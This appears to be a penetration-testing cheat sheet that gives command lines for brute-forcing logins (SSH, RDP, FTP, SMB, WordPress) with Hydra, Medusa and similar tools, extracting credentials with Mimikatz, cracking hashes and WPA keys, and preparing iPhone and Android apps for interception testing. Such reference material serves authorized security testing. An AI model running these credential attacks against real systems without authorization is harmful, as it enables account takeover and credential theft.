medusa -H hosts.txt -U users.txt -P passwords.txt -T 10 -t 5 -L -F -M smbnt
Medusa allows username, password, and host data to be placed within the same file (the "combo" file).
Possible combinations in the combo file:
host:username:password
host:username:
host::
:username:password
:username:
::password
host::password
🆔lm:ntlm::: (PwDump files)
To test each username/password entry in the file combo.txt
medusa -M smbnt -C combo.txt
[+] Hydra #hydra does not have a native default wordlist, using the Rockyou list is suggested #example brute force crack on ftp server hydra -t 1 -l admin -P [path to password.lst] -vV [IPaddress] ftp --> -t # = preform # tasks --> -l NAME = try to log in with NAME --> -P [filepath] = Try password --> -vV = verbose mode, showing the login+pass for each attempt
#check for joe accounts by adding modifier -e s
#Hydra brute force against SNMP hydra -P password-file.txt -v $ip snmp
#Hydra FTP known user and password list hydra -t 1 -l admin -P /root/Desktop/password.lst -vV $ip ftp
#Hydra SSH using list of users and passwords hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh
#Hydra SSH using a known password and a username list hydra -v -V -u -L users.txt -p "" -t 1 -u $ip ssh
#Hydra SSH Against Known username on port 22 hydra $ip -s 22 ssh -l -P big_wordlist.txt
#Hydra POP3 Brute Force hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V
#Hydra SMTP Brute Force hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V
#Hydra attack http get 401 login with a dictionary hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin
#Hydra attack Windows Remote Desktop with rockyou hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
#Hydra brute force a Wordpress admin login hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
#to write found login+pass combinations to fiel, add modifier -0 [fileanme]
[+] Mimikatz #Extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets https://github.com/gentilkiwi/mimikatz From metasploit meterpreter (must have System level access):
meterpreter> load mimikatz meterpreter> help mimikatz meterpreter> msv meterpreter> kerberos meterpreter> mimikatz_command -f samdump::hashes meterpreter> mimikatz_command -f sekurlsa::searchPasswords
[+] ncrack #ncrack (from the makers of nmap) can brute force RDP ncrack -vv --user offsec -P password-file.txt rdp://$ip
[+] John The Ripper #To show the types of passwords that John can crack with crack speed (in cracks/second) john --test
#unshadow passwd-file.txt shadow-file.txt unshadow passwd-file.txt shadow-file.txt > unshadowed.txt john $ip.pwdump john --wordlist=/usr/share/wordlists/rockyou.txt hashes john --rules --wordlist=/usr/share/wordlists/rockyou.txt john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
#JTR forced descrypt cracking with wordlist john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt
#JTR forced descrypt brute force cracking john --format=descrypt hash --show
#To use your own word list (the Rockyou list is suggested) john --wordlist=[filename] [passwordfile]
#To show your results after running john (shows ~/.john/john.pot) john --show
#To restore an interrupted john session john --restore
[+] Hashcat #Hashcat uses precomputed dictionaries, rainbow tables, and even a brute-force approach to find an effective and efficient way crack passwords.
#usage: hashcat [options] hash|hasfile|hccapxfile [dictonary|mask|directory]
Important options are -m --hashtype and -a --attack-mode
Example: hashcat -a 0 -m 500 -o output.txt hashes.txt rockyou.txt
#Attack modes 0 - Straight 1 - Combination 3 - Brute-force 6 - Hybrid wordlist+Mask 7 - Hybrid mask + Wordlist
Hash types
Hash cat can crack numerous types of hashes. When the hashes doesn't match with hash type(-m) option "line length execption" arises Quick reference to check hash type with example: https://hashcat.net/wiki/doku.php?id=example_hashes
[+] Cain and Abel #Cain and Abel is a hacking application exclusive to Windows, it can crack numerous hash types, including NTLM, NTLMv2, MD5, wireless, Oracle, MySQL, SQL Server, SHA1, SHA2, Cisco, VoIP, and many others.
#To perform dictionary attack for cracking passwords by using cain and abel first import the NTLM hashes. Next in cracker tab, all imported username and hashes will be displayed. Select desired user, right click and select dictonary attack NTLM hashes window will popup Right click on top blank area Select Add to list and browse dictonary or wordlist file Click start
[+] Ophcrack #Ophcrack is a free rainbow table-based password cracking tool for Windows 8 (both local and Microsoft accounts), Windows 7, Windows Vista, and Windows XP.
#The Ophcrack LiveCD option allows for completely automatic password recovery.
#It cracks LM and NTLM (Windows) hashes.
#Pros Software is freely available for download online Passwords are recovered automatically using the LiveCD method No software installation is necessary to recover passwords No knowledge of any existing passwords is necessary
#Cons LiveCD ISO image must be burned to a disc or USB device before being used Passwords greater than 14 characters cannot be cracked Won't crack even the simplest Windows 10 password
[+] RainbowCrack #The RainbowCrack software cracks hashes by rainbow table lookup.
#To crack single hash rcrack [rainbow_table_path] -h hash_to_be_cracked Path - Location of rainbow tables Example: rcrack c:\rt -h fcea920f7412b5da7be0cf42b8c93759
#To crack multiple hashes in a file rcrack [rainbow_table_path] -l hash_file Example: rcrack c:\rt -l hash_list_file
#To lookup rainbow tables in multiple directories rcrack [rainbow_table_path] [rainbow_table_path2] -l hash_file Example: rcrack c:\rt1 c:\rt2 -l hash_list_file
#To load and crack LM hashes from pwdump file rcrack [rainbow_table_path] -lm pwdump_file
#To load and crack NTLM hashes from pwdump file rcrack [rainbow_table_path] -ntlm pwdump_file
[+] acccheck #Windows Password dictionary attack tool for SMB
#Usage: acccheck [options] options -t [single host IP address] -T [file containing target ip address(es)] -p [single password] -P [file containing passwords] -u [single user] -U [file containing usernames]
#Examples Attempt the 'Administrator' account with a [BLANK] password. acccheck -t 10.10.10.1 Attempt all passwords in 'password.txt' against the 'Administrator' account. acccheck -t 10.10.10.1 -P password.txt Attempt all password in 'password.txt' against all users in 'users.txt'. acccehck -t 10.10.10.1 -U users.txt -P password.txt Attempt a single password against a single user. acccheck -t 10.10.10.1 -u administrator -p password
[+]Brutespray #BruteSpray takes nmap GNMAP/XML output and automatically brute-forces services with default credentials using Medusa.
#usage: brutespray [-h] -f FILE [-o OUTPUT] [-s SERVICE] [-t THREADS] [-T HOSTS] [-U USERLIST] [-P PASSLIST] [-u USERNAME] [-p PASSWORD] [-c] [-i] #Example brutespray --file nas.gnmap -U /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/password.lst --threads 3 --hosts 1 Attack all services in nas.gnmap with a specific user list (unix_users.txt) and password list (password.lst).
[+]Crowbar #Crowbar is a brute force tool which supports OpenVPN, Remote Desktop Protocol, SSH Private Keys and VNC Keys.
#usage: crowbar -b [openvpn | rdp | sshkey | vnckey] [arguments] Example:crowbar -b rdp -s 192.168.86.61/32 -u victim -C /root/words.txt -n 1 Brute force the RDP service on a single host with a specified username and wordlist, using 1 thread.
[+]Aircrack-ng #Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured.
#usage aircrack-ng [options] <.cap / .ivs file(s)> To have aircrack-ng conduct a WEP key attack on a capture file, pass it the filename, either in .ivs or .cap/.pcap format.
#WPA Wordlist Mode aircrack-ng -w password.lst wpa.cap Specify the wordlist to use (-w password.lst) and the path to the capture file (wpa.cap) containing at least one 4-way handshake.
#Basic WEP Cracking aircrack-ng all-ivs.ivs To have aircrack-ng conduct a WEP key attack on a capture file, pass it the filename, either in .ivs or .cap/.pcap format.
MOBILE TESTING
http://pen-testing.sans.org/blog/pen-testing/2013/12/02/mobile-device-tips-tricks-and-resources
------------------------------------------ Mobile Application Test Notes (iPhone)
Prepping Device and Application:
[+] Jailbreak iPhone/iPad - Green Poison / Absinthe 2.04 [+] Enable SSH on iPhone/iPad [+] Install iFunbox to install the application (http://www.i-funbox.com) [+] Connect device to lab wireless network [+] Add web proxy settings - IP address of attacking machine port 8080 [+] Ensure connection and SSH is working
Prepping Burp Suite:
[+] Open Burp Suite and navigate to Proxy->Options, [-] Edit proxy listeners – enter ‘port’ as 8080, disable ‘loopback only’ and select ‘support invisible’.
[+] Download and install burp certificate (.crt) onto ipad.
Mobile Application Penetration Testing:
[+] Browse the following Directory for insecure storage [-] /private/var/mobile/applications/
Notes:
[+] Application file type - x.ipa
[+] Easy way:
Place attacking machine and apple device on wireless network with app installed.
Email burps .cer to apple device and install
Start burp and disable firewall on listening machine.
Change proxy settings on apple device to point to listening burp machine/port.
------------------------------------------ Mobile Application Test Notes (Android)
Prepping the application (After Android Nougat, Apps need to repackaged since they don't trust user certificates by default)
https://android-developers.googleblog.com/2016/07/changes-to-trusted-certificate.html
[+] apktool d <path of the .apk file> [+] Update AndroidManifest.xml [-] Add android:networkSecurityConfig="@xml/network_security_config" to application tag in xml [+] Add network_security_config.xml to res/xml folder [-] "Trusting user-added CAs for all secure connections" section in https://android-developers.googleblog.com/2016/07/changes-to-trusted-certificate.html [+] Repackage the application [-] apktool b unpacked_apk_folder -o [+] Signing the application [-] Create a keystore using keytool [-] jarsigner -keystore -storepass -keypass android
Creating an emulator and installing the application
[+] Create a virtual device: [-] android avd
[+] Start the emulator: [-] emulator –avd testavd
[+] Install the application: [-] adb install <path of the .apk file>
[+] Open Burp Suite and navigate to Proxy->Options, [-] Edit proxy listeners – enter ‘port’ as 8080, disable ‘loopback only’ and select ‘support invisible’.
[+] Start the emulator and proxy: [-] emulator –avd testavd –http-proxy http://localhost:8080
[+] Download and install burp certificate (.crt) onto the emulator using the push shell command.
Notes:
[+] Application file type - x.apk
Install Certs: http://www.realmb.com/droidCert/ SQLite Database Browser: http://sourceforge.net/projects/sqlitebrowser/?source=pdlp
http://www.mcafee.com/uk/resources/white-papers/foundstone/wp-pen-testing-android-apps.pdf
Last updated